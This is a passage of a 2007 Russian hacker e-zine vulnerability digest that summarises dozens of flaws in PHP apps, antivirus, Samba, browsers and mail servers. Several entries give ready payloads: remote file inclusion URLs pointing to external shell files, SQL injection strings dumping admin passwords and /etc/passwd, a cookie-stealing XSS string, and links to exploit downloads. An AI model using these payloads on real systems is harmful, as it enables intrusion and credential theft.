>> Bugtrack
Автор: sk.r[00]t
~~~~~~~~~~~~~~~~~~
>> intR0
Вот самая первая пачка Багтрака езиноса :)
Думаю ты будешь используешь эту инфу по назначению...
З.Ы. По мере выхода новых номеров этого езина, bugtraq будет модернизироваться
как графически, так и в плане качества обзора багов.
З.Ы. Внизу тебя ждёт сюрприз! %-)
>>> T.O. B.E. C.O.N.T.I.N.U.E.D. <<<
[ 08 февраля, 2007 ]
Переполнение буфера в RARLabs Unrar
Программа:
RARLabs Unrar 3.60 for Linux
RARLabs Unrar 3.61 for Windows
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных при обработке архивов, защищенных паролем.
Атакующий может передать специально сформированные архивы, что приведет к выполнению произвольного кода с
привилегиями пользователя, открывшего архив.
[ 08 февраля, 2007 ]
Переполнение буфера в Trend Micro AntiVirus
Программа:
Trend Micro's PC-Cillin Internet Security 2007
ServerProtect for Linux v2.5 on RHEL 4.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в сканирующем движке (VsapiNI.sys) в проверке входных данных при
обработке запакованных UPX исполняемых файлов. Атакующий может передать специально сформированные UPX файлы,
что приведет к выполнению произвольного кода.
[ 08 февраля, 2007 ]
Обход ограничений безопасности в Advanced Poll
Программа: Advanced Poll 2.0.5-dev
Уязвимость позволяет удаленному злоумышленнику обойти механизм аутентификации на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных. Атакующий может обойти механизм аутентификации
и получить доступ к сессии под учетной записью администратора.
Эксплоит: http://www.xakep.ru/post/36667/Advanced_Poll_admin_session_gen_exploit.txt
[ 08 февраля, 2007 ]
Повышение привилегий в Trend Micro Antivirus
Программа:
Trend Micro's PC-Cillin Internet Security 2007
TmComm.sys version 1.5.0.1052
Уязвимость позволяет удаленному злоумышленнику выполнить вредоносные действия с повышенными привилегиями
на целевой системе. Уязвимость существует из-за ошибки в TmComm.sys, входящего в состав антивирусного ядра.
Небезопасные полномочия на доступ на запись для "Everyone" присваиваются \\.\TmComm интерфейсу DOS устройства.
Локальный атакующий может получить доступ к IOCTLs, который предназначен только для привилегированных пользователей.
В результате атакующий может выполнить произвольный код с привилегиями ядра.
[ 08 февраля, 2007 ]
PHP-инклюдинг в AgerMenu
Программа: AgerMenu 0.01
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «rootdir» сценарием top.inc.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
[ 08 февраля, 2007 ]
PHP-инклюдинг в WebMatic
Программа: WebMatic 2.6
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах «P_LIB» и «P_INDEX»
сценарием index_album.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Примеры:
[Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt
[Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt
[ 08 февраля, 2007 ]
PHP-инклюдинг в Maian Recipe
Программа: Maian Recipe 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах «path_to_folder»
сценарием class_mail.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Пример:
http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]
[ 08 февраля, 2007 ]
SQL-инъекция и межсайтовый скриптинг в OTSCMS
Программа: OTSCMS 2.1.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и
осуществить XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре «command»
сценарием priv.php и в параметре «module» сценарием forum.php. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных приложения и осуществить XSS нападение.
Пример:
SQL:
http://[target]/[path]/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts
XSS:
http://[target]/[path]/forum.php?module=User&command=profile&name=<script>alert(document.cookie);</script>
[ 08 февраля, 2007 ]
Выполнение произвольных команд в SysCP
Программа: SysCP 1.x
Найденные уязвимости позволяют удаленному злоумышленнику выполнить произвольный код на целевой системе.
1) Уязвимость существует из-за ошибки в проверке имен директорыи в домашнем каталоге пользователя.
Когда пользователь защищает эту директорию с помощью панели управления атакующий может использовать сценарий
cron для выполнения произвольных команд с привилегиями root.
2) Уязвимость существует из-за ошибки в проверке файлов из базы данных в таблице "panel_cronscript"
сценарием "scripts/cronscript.php". Атакующий может выполнить произвольные сценарии PHP с привилегиями root.
Успешное эксплуатирование уязвимости требует наличия доступа к базе данных.
Эксплоит: Нет
[ 08 февраля, 2007 ]
Обход ограничений безопасности в pam_ssh
Программа: pam_ssh 1.x
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе.
Уязвимость существует из-за того, что pam_ssh не правильно ограничивает использование приватных ключей с пустым паролем,
даже если опция "allow_blank_password" выключена. Атакующий может использовать приватные ключи с пустыми паролями,
и вводить произвольные не пустые пароли при запросе.
Эксплоит: Нет
[ 08 февраля, 2007 ]
Межсайтовый скриптинг в MoinMoin
Программа: MoinMoin 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах «page info» и «page name».
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит: Нет
[ 08 февраля, 2007 ]
PHP-инклюдинг в Site-Assistant
Программа: Site-Assistant 0990
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «paths[version]» сценарием menu.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит: Да (http://www.xakep.ru/post/36682/Site-Assistant_Remote_File_Include_Exploit.txt)
[ 08 февраля, 2007 ]
Межсайтовый скриптинг в vBulletin
Программа: vBulletin 3.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных в поле формы «Extension» сценарием
admincp/attachment.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Эксплоит: Нет
[ 08 февраля, 2007 ]
SQL-инъекция в LightRO CMS
Программа: LightRO CMS 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «projectid» сценарием index.php.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Эксплоит: Да (http://www.xakep.ru/post/36684/LightRO_CMS_Remote_SQL_Injection_Exploit.txt)
[ 08 февраля, 2007 ]
SQL-инъекция в LushiNews
Программа: LushiNews 1.01
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных
приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием
comments.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Наличие эксплоита: Да (линк: http://www.xakep.ru/post/36685/LushiNews_Remote_SQL_Injection_Exploit.txt)
[ 08 февраля, 2007 ]
SQL-инъекция в LushiWarPlaner
Программа: LushiWarPlaner 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в
базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в
параметре «id» сценарием register.php. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.
Наличие эксплоита: да (линк: http://www.xakep.ru/post/36686/LushiWarPlaner_Remote_SQL_Injection_Exploit.txt)
[ 08 февраля, 2007 ]
Программа: Mozilla Firefox 1.5.0.9, возможно более ранние версии.
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к важным данным на системе.
1. Уязвимость существует из-за того, что заблокированные всплывающие окна (попапы) выполняются
с привилегиями локальной зоны, что позволяет злоумышленнику обойти межзоновые ограничения
и прочитать произвольные file:// URI. Для успешной эксплуатации уязвимости злоумышленник должен заставить
пользователя отобразить заблокированный попап.
2. Уязвимость существует из-за того, что функция nsExternalAppHandler::SetUpTempFile создает файлы с
предсказуемыми именами, основанными на времени создания, что позволяет злоумышленнику выполнить произвольный
код сценария с помощью специально сформированного XMLHttpRequest запроса.
Совместно с уязвимостью #1 злоумышленник может сохранить на локальной системе специально сформированный
HTML файл и выполнить его в браузере жертвы в контексте безопасности локальной зоны.
URL производителя: www.mozilla.com
[ 08 февраля, 2007 ]
Программа: FreeProxy 3.81 build 1511, возможно более ранние версии.
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.
Уязвимость существует из-за ошибки при обработке HTTP заголовка "Host". Удаленный пользователь может с
помощью специально сформированного GET запроса вызвать отказ в обслуживании приложения.
URL производителя: www.alphalink.com.au/~gregr/freeproxy.htm
Решение: Установите последнюю версию (build 1626 или выше) с сайта производителя.
[ 08 февраля, 2007 ]
Программа: avast! Server Edition версии до 4.7.726.
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет локальному пользователю обойти некоторые ограничения безопасности.
Уязвимость существует из-за того, что приложение не требует пароль для изменения некоторых
настроек, даже если пароль установлен.
URL производителя: www.avast.com/eng/avast_4_server.html
Решение: Установите последнюю версию (4.7.726) с сайта производителя.
Ссылки:
http://www.avast.com/eng/avast-4-server-revision-history.html
[ 08 февраля, 2007 ]
Программа: STLport версии до 5.0.3.
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании или
скомпрометировать целевую систему.
1. Уязвимость существует из-за неизвестной ошибки при обработке чисел с плавающей точкой.
Удаленный пользователь может вызвать переполнение буфера.
2. Уязвимость существует из-за неизвестной ошибки в rope конструкторах, которая позволяет
злоумышленнику вызвать переполнение буфера.
URL производителя: stlport.sourceforge.net
Решение: Установите последнюю версию (5.0.3) с сайта производителя.
[ 08 февраля, 2007 ]
Программа: FlashChat 4.7.8, возможно более ранние версии.
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в поле названия
комнаты в сценарии info.php. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
URL производителя: www.tufat.com/s_flash_chat_chatroom.htm
Решение: Способов устранения уязвимости не существует в настоящее время.
[ 08 февраля, 2007 ]
Программа: VirtueMart 1.0.7, возможно более ранние версии.
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить
произвольные SQL команды в базе данных приложения.
1. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольный код сценария в
браузере жертвы в контексте безопасности уязвимого сайта.
URL производителя: virtuemart.net
Решение: Установите последнюю версию (1.0.8) с сайта производителя.
[ 08 февраля, 2007 ]
Программа: Samba версии до 3.0.24.
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании или
выполнить произвольный код на целевой системе.
1. Уязвимость существует из-за того, что при некоторых обстоятельствах smbd не удаляет запросы
из файла очереди. Злоумышленник может вызвать зацикливание приложения во время переименования файла.
2. Samba использует имена файлов как параметры форматной строки при вызове функции "sprintf()" во время
установки списков доступа Windows с использованием VFS плагина afsacl.so. Удаленный пользователь может
выполнить произвольный код на целевой системе. Для успешной эксплуатации уязвимости файловая система
AFS должна быть доступной CIFS клиентам посредством afsacl.so VFS модуля и атакующий должен иметь
привилегии на запись в общую папку.
URL производителя: www.samba.org
Решение: Установите последнюю версию (3.0.24) с сайта производителя.
[ 08 февраля, 2007 ]
Программа: SMA-DB 0.3.9, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "pfad_z" в сценарии
theme/settings.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе
с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена
в конфигурационном файле PHP. Пример:
http://[host]/theme/settings.php?pfad_z=[file]
URL производителя: people.ee.ethz.ch/~dmaeder/bluevirus/main.php?tpc=programs
Решение: Способов устранения уязвимости не существует в настоящее время.
[ 08 февраля, 2007 ]
Программа: DreamStats 4.2, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "rootpath" в сценарии
index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть
включена в конфигурационном файле PHP.
URL производителя: mnprojects.com/dreamstats/
Решение: Установите последнюю версию 5.0 с сайта производителя.
[ 08 февраля, 2007 ]
Программа: phpBB++ Build 101, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в
сценарии includes/functions.php. Удаленный пользователь может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals"
должна быть включена в конфигурационном файле PHP.
URL производителя: sourceforge.net/projects/phpbbplusplus/
Решение: Способов устранения уязвимости не существует в настоящее время.
[ 08 февраля, 2007 ]
Программа: HLstats версии до 1.35
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в классе поиска.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный
код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
URL производителя: www.unitedadmins.com/index.php?p=content&content=hlstats
Решение: Установите последнюю версию (1.35) с сайта производителя.
[ 08 февраля, 2007 ]
Программа: Samba 3.0.21 - 3.0.23d на Sun Solaris
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки проверки границ данных в функциях "gethostbyname()" и "getipnodebyname()"
в библиотеке "nss_winbind.so.1". Удаленный пользователь может с помощью слишком длиной строки, переданной интерфейсу
NSS, вызвать переполнение буфера и выполнить произвольный код на целевой системе. Для успешной эксплуатации
уязвимости должен быть запущен демон winbindd, сконфигурированный на использование библиотеки "nss_winbind.so.1".
URL производителя: www.samba.org
Решение: Установите последнюю версию (3.0.24) с сайта производителя.
Источник:
CVE-2007-0453: Buffer overrun in NSS host lookup Winbind library on Solaris
[ 07 февраля, 2007 ]
Программа: Blue Coat WinProxy 6.1a и 6.0 r1c, возможно более ранние версии.
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный
код на целевой системе.
Уязвимость существует из-за ошибки при обработке HTTP CONNECT запросов. Удаленный пользователь может
послать прокси серверу специально сформированный запрос CONNECT, вызвать переполнение динамической памяти
и выполнить произвольный код на целевой системе.
URL производителя: www.winproxy.com
Решение: Установите последнюю версию (6.1r1c) с сайта производителя.
Источник:
Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability
[ 07 февраля, 2007 ]
Программа: Blue Coat WinProxy 6.1a и 6.0 r1c, возможно более ранние версии.
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный
код на целевой системе.
Уязвимость существует из-за ошибки при обработке HTTP CONNECT запросов. Удаленный пользователь может
послать прокси серверу специально сформированный запрос CONNECT, вызвать переполнение динамической памяти и
выполнить произвольный код на целевой системе.
URL производителя: www.winproxy.com
Решение: Установите последнюю версию (6.1r1c) с сайта производителя.
Источник:
Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability
[ 07 февраля, 2007 ]
Межсайтовый скриптинг в KDE Konqueror KHTML библиотеке
Программа: KDE 3.5.6
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных в HTML страницах в тегах <title>.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
<title>myblog<!--</title></head><body><script> src=http://beanfuzz.com/bean.js> --></title>
[ 07 февраля, 2007 ]
Отказ в обслуживании в Comodo Firewall
Программа:
Comodo Firewall Pro 2.4.16.174
Comodo Personal Firewall 2.3.6.81
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в проверке входных данных в драйвере CMDMon.SYS.
Атакующий может передать специально сформированные данные, что приведет к отказу приложения в обслуживании.
Эксплоит: http://www.xakep.ru/post/36655/Comodo_Firewall_DoS_exploit.txt
[ 07 февраля, 2007 ]
Отказ в обслуживании в Microsoft Internet Explorer
Программа: Microsoft Internet Explorer 6.0
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в проверке входных данных в msxml3 модуле при обработке XML файлов
с большим числом наследуемых тегов (10-1000), перерисовываемых в IFRAME каждые 50-100 миллисекунд.
Атакующий может обманным образом заставить пользователя зайти на злонамеренный сайт, содержащий специально
сформированные XML страницы, что приведет к отказу системы в обслуживании.
Пример:
http://lcamtuf.coredump.cx/iediex/iediex.html
[ 07 февраля, 2007 ]
SQL-инъекция в Kisisel Site
Программа: Kisisel Site 2007
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «sayfa» сценарием forum.asp.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды
в базе данных приложения.
Пример:
http://[SITE]/forum.asp?sayfa=konular&forumid=-1%20union+all+select+0,kullaniciadi,2,3,sifre,5,6,7+from+admin
[ 07 февраля, 2007 ]
PHP-инклюдинг в LightRO CMS
Программа: LightRO CMS 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «dateien[news]» сценарием inhalt.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
//inhalt.php?dateien[news]=http://[target]/[path]/shell.x
[ 07 февраля, 2007 ]
Отказ в обслуживании в SmartFTP Client
Программа: SmartFTP Client 2.0.1002
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в проверке входных данных при обработке баннеров.
Атакующий может передать специально сформированные баннеры длиной более 5000 байт, что приведет к отказу приложения
в обслуживании.
Эксплоит: http://www.xakep.ru/post/36647/SmartFTP_Client_Heap_Overflow_DoS_exploit.txt
[ 07 февраля, 2007 ]
Отказ в обслуживании в FlashFXP
Программа: FlashFXP 3.4.0 build 1145
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в проверке входных данных при обработке PWD команд.
Атакующий может передать специально сформированные PWD команды, размером более 5420 байт,
что приведет к отказу приложения в обслуживании.
Эксплоит: http://www.xakep.ru/post/36646/FlashFXP_Buffer_Overflow_DoS_exploit.txt
[ 07 февраля, 2007 ]
Переполнение буфера в Alibaba Alipay
Программа: Alibaba Alipay
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в китайской системе on-line платежей Alipay.
Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.
Эксплоит: http://www.xakep.ru/post/36645/Alibaba_Alipay_Remote_Code_Execution_exploit.txt
[ 07 февраля, 2007 ]
Выполнение произвольного кода в MySQL
Программа: MySQL 4.x/5.0
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в использовании UDF (User Defined Functions) механизма.
Атакующий может выполнить произвольный код на целевой системе.
Эксплоиты:
http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz
http://www.milw0rm.com/sploits/02062007-raptor_winudf.tgz
[ 06 февраля, 2007 ]
Повышение привилегий в X-Kryptor Secure Client
Программа: X-Kryptor Secure Client
Уязвимость позволяет удаленному злоумышленнику выполнить вредоносные действия с повышенными привилегиями
на целевой системе. Уязвимость существует из-за того, что приложение позволяет пользователю вручную открыть
окно Explorer в контексте оригинального приложения (обычно с правами SYSTEM), нажав F1 во время предоставления
приглашения на ввод учетных данных RSA. Атакующий может выполнить произвольный код с повышенными привилегиями.
[ 06 февраля, 2007 ]
Предсказуемый идентификатор сессии в Jetty
Программа:
Jetty 3.x
Jetty 4.x
Jetty 5.x
Jetty 6.x
Уязвимость позволяет локальному злоумышленнику получить несанкционированный доступ к конфиденциальной
информации на целевой системе. Уязвимость существует из-за того, что приложение генерирует предсказуемые
идентификаторы сессий. Атакующий может подобрать соответствующий идентификатор и получить конфиденциальные
данные, доступные при установлении сессионного соединения.
[ 06 февраля, 2007 ]
Нарушение конфиденциальности информации в HP True64
Программа: HP True64 Alpha OSF1 5.1
Уязвимость позволяет локальному злоумышленнику получить несанкционированный доступ к
конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, позволяющей
непривилегированным пользователям увидеть значения всех переменных окружения процессов. Локальный
атакующий может выполнить в командной строке команду вида «/usr/ucb/ps auxeww», что позволит ему просмотреть
значения всех переменных окружения.
Эксплоит: http://www.xakep.ru/post/36640/HP_True64_Alpha_exploit.txt
[ 06 февраля, 2007 ]
Отказ в обслуживании в MS Internet Explorer
Программа: MS Internet Explorer 6
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки разыменования нулевого указателя в mshtml.dll.
Атакующий может передать специально сформированные данные, что приведет к отказу приложения в обслуживании.
Эксплоит: http://www.xakep.ru/post/36627/Microsoft_Internet_Explorer_DoS_exploit.txt
[ 05 февраля, 2007 ]
SQL-инъекция в Oracle
Программа: Oracle 9i/10g
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных при использовании dbms_export_extension.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Эксплоит: http://www.xakep.ru/post/36625/Oracle_SQL_Injection_exploit.txt
[ 05 февраля, 2007 ]
Межсайтовый скриптинг в MediaWiki
Программа: MediaWiki 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных в функциональности «sortable table».
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
[ 05 февраля, 2007 ]
PHP-инклюдинг в Simple Invoices
Программа: Simple Invoices
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «module» и «view»
сценарием controller.php. Удаленный пользователь может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера
Пример:
http://www.Site.com/theme/settings.php?pfad_z=[Shell]
[ 05 февраля, 2007 ]
PHP-инклюдинг в Geeklog
Программа: Geeklog 2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «glConf[path_libraries]»
сценарием BaseView.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Пример:
v.Cc/[path]/system/libraries/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=Evil.txt?
[ 05 февраля, 2007 ]
Обход ограничений безопасности в продуктах Avaya
Программа:
Avaya Converged Communications Server (CCS) 2.x
Avaya Converged Communications Server (CCS) 3.x
Avaya Intuity LX
Avaya Message Networking 2.x
Avaya Modular Messaging 2.x
Avaya Modular Messaging 3.x
Avaya S8XXX Media Servers
Avaya SIP Enablement Services (SES) 3.x
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в OpenSSH в мониторе распределения привилегий.
Атакующий может выполнить злонамеренные действия, что позволите ему обойти процесс аутентификации.
[ 05 февраля, 2007 ]
Программа:
Avaya Call Management System (CMS)
Avaya Interactive Response 1.x
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в проверке входных данных в Sun Solaris rpcbind.
Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании.
[ 05 февраля, 2007 ]
Переполнение буфера в Ipswitch IMail Server and Collaboration Suite
Программа: Ipswitch IMail Server and Collaboration Suite
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в демоне SMTP. Атакующий может передать
специально сформированные данные, что приведет к выполнению произвольного кода.
Эксплоиты:
http://www.securityfocus.com/data/vulnerabilities/exploits/19885_imail.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/imail_smtp_rcpt_overflow.pm
http://www.securityfocus.com/data/vulnerabilities/exploits/Imail_smtp_rcp_rexp.pl
[ 05 февраля, 2007 ]
SQL-инъекция в Woltlab Burning Board Lite
Программа: Woltlab Burning Board Lite 1.0.2pl3e
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «folderid» сценарием pms.php.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды
в базе данных приложения.
Эксплоит: http://www.xakep.ru/post/36614/Woltlab_Burning_Board_Lite_sql_injection_exploit.txt
[ 05 февраля, 2007 ]
SQL-инъекция в Photo Galerie Standard
Программа: Photo Galerie Standard 1.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием view.php.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Пример:
//view.php?id=-1%20union%20select%201,load_file(char((47, 101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/ *&categorie=8&next=1
[ 05 февраля, 2007 ]
PHP-инклюдинг в KDPics
Программа: KDPics 1.11
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «lib_path» сценарием exif.php
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://www.victime.com/[KDPics_path]/lib/exifer/exif.php?lib_path?=Evil.txt?cmd
[ 05 февраля, 2007 ]
PHP-инклюдинг в Flip
Программа: Flip 2.01 final
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «theme» сценарием previewtheme.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://Www.Victim.Com/[path]/[path]/previewtheme.php? theme=1&inc_path=Evil.txt?cmd
[ 05 февраля, 2007 ]
Отказ в обслуживании в Chicken of the VNC
Программа: Chicken of the VNC 2.0
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в ошибки разыменования нулевого указателя. Атакующий может передать
специально сформированные данные, что приведет к отказу системы в обслуживании.
Эксплоит: http://www.xakep.ru/post/36610/Chicken_of_the_VNC_DoS_exploit.txt
[ 05 февраля, 2007 ]
Отказ в обслуживании в Remotesoft .NET Explorer
Программа: Remotesoft .NET Explorer 2.0.1
Уязвимость позволяет локальному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в проверке входных данных большого размера (около 80000 байт).
Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании.
Эксплоит: http://www.xakep.ru/post/36609/Remotesoft_NET_Explorer_Stack_Overflow_exploit.txt
[ 05 февраля, 2007 ]
Переполнение буфера в Microsoft Word
Программа: Microsoft Word 2000
Уязвимость позволяет локальному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных при обработке документов MS Word.
Атакующий может передать специально сформированные документы, что приведет к выполнению произвольного кода.
Пример:
http://www.milw0rm.com/sploits/02032007-word2000exp.doc
Эксплоит: см. выше, а также сплоит можно найти в архиве milw0rm.tar.bz2 который входит в состав езиноса.
[ 05 февраля, 2007 ]
Переполнение буфера в Imail
Программа: Imail 8.10-8.12
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных при обработке «RCPT TO» команд.
Атакующий может передать специально сформированные данные, в качестве параметра уязвимой команде,
что приведет к выполнению произвольного кода.
Эксплоиты:
http://www.xakep.ru/post/36607/Imail_Remote_Buffer_Overflow_Exploit.txt
